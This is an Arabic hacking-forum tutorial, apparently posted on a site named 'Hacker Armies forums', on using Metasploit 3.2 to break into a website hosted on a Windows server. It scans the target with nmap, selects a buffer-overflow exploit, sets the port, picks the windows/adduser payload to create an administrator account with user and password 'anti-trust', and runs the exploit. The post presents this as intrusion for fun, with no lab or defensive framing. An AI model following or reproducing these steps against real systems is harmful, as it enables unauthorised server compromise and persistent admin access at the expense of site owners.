بسم الله الرحمن الرحيم
اليوم جايبلكم الاختراق المتقدم (m-e-t-a-s-p-l-o-i-t)
الاداة من عده نواحي..اثبات جدارتها واحتلالها مراتب افضل 10 برامج اختراق مفتوحة
المصدر (مجانية) التحميل ..(اخر اصدار 3.2)
بعدة نسخة متوفرة لجميع الانظمة ..اما من ناحية التثبيت ..تثبت كأي برنامج اخر..ومرفق مع الاداة
عده ادوات اخري مساعده في الاختراق مثل اداة nmap وسيظهر اثناء التثبيت سؤال اختياري لتثبيت
الادوات المرفقة..نشرح بعض مميزات الاداة :
طبعا هناك طريقتين لاستخدام البرنامج :
الاولي ..ولكن انا شخصيا لا افضلها لان البرنامج سيتعرف تلقائيا علي لغة الجهاز..(عربي )
وستواجه مشاكل اللغة مع البرنامج..والشرح سيتم علي الطريقة الثانية ..
الثانية ..سيقوم البرنامج بانشاء سيرفر وهمي محلي ..واستخدامه مع امكانية تحكم غير محدودة
بخيارات..طرق ومميزات مذهلة ..وهي m-e-t-a-s-p-l-o-i-t web 3 تحصلها من الستارت
شاهد عنوان الويب في الاعلي :
يستخدم لوكال هوست من البورت 55555
وهذه هي الصورة الرئيسية للبرنامج ..
طيب احنا قلنا ..الموضوع متجدد ..وسيتم متابعه الموضوع يوميا ..انا اعطيت لمحة سريعة عن البرنامج
طيب حتي نعرف فوائد البرنامج ناخذ نظرة سريعة ع الطاير ونخترق موقع مثلا نختار موقع علي سيرفر
ويندوز..لانه في ناس بتكره سيرفرات الويندوز وبقولوا انه مستحيل اختراقها ..
ناخذ نظرة علي شل البرنامج CONSOLE
طبعا هذا المهم عندنا ..ناخذ اوامره كاملة:
طبعا هذه الاوامر المستخدمة كاملة مع شرح وظيفتها مقابل كل امر..
طيب سبق وقلنا انه يرفق مع الاداة برنامج فاحص المواقع الشهير nmap
انا فحت الموقع المراد بالبرنامج وعرفت البرامج الي مركبها ..مع بورتات كل برنامج مركب علي السيرفر..
نشوف طريقة الاستغلال ..
زي ما انتوا شايفين طبعا الثغرة من ثغرات البفر (الفيض ) نستخدمها هي طبعا ..نظغط عليها ونشوف
طبعا بعد فحص الموقع ومنافذه بالبرنامج nmap وجدت البورت الاتي ..الذي ساقوم بوضعه في الاستغلال
شاهد الاتي ..عند الضغط علي الاستغلال المطلوب يطلب منك ادخال البيانات حسب نوع الثغرة ..
الموضوع الأصلي منها منتديات جيوش الهكرز :-http://www.aljyyosh.co.cc/vb/f20/55/#post54
نكتب الامر الاتي :
اقتباس:
show options
الان نستخدم الامر SET لتاكيد الهدف مع البورت بالطريقة الاتية..
و
SET RPORT رقم البورت
وطبعا الان ننتقل الي الامر التالي
اقتباس:
show payloads
طبعا انا ساختار التالية
اقتباس:
windows/adduser
لاسباب انا افضلها ..لسيرفرات الويندوز يفضل اضافة يوزر ..بصلاحيات مدير حتي يكون اللعب افضل
بالسيرفر
بالامر التالي:
اقتباس:
set payload windows/adduser
اقتباس:
نرجع للامر التالي ..show options
بالامر التالي لليوزر والباس..
اقتباس:
set user anti-trust
set pass anti-trust
نعطي الان الامر السابق show options لنشاهد التاكيد علي الامر السابق ..
بقي الان امر واحد لاتمام الاختراق ..بعد الانتهاء من جميع الخطوات ..
اقتباس:
exploit
طبعا هذا بالنسبة لاضافة يوزر في سيرفرات الويندوز..
هناك عده طرق لاختراق المواقع بواسطة هذه الاداة ولن نمر عليها مرور الكرام ..
سنقوم بشرح طرق اختراق اخري ..حتي يتم الوصول لمرحلة جيدة باستخدامها ..
لا تنسوا الردود
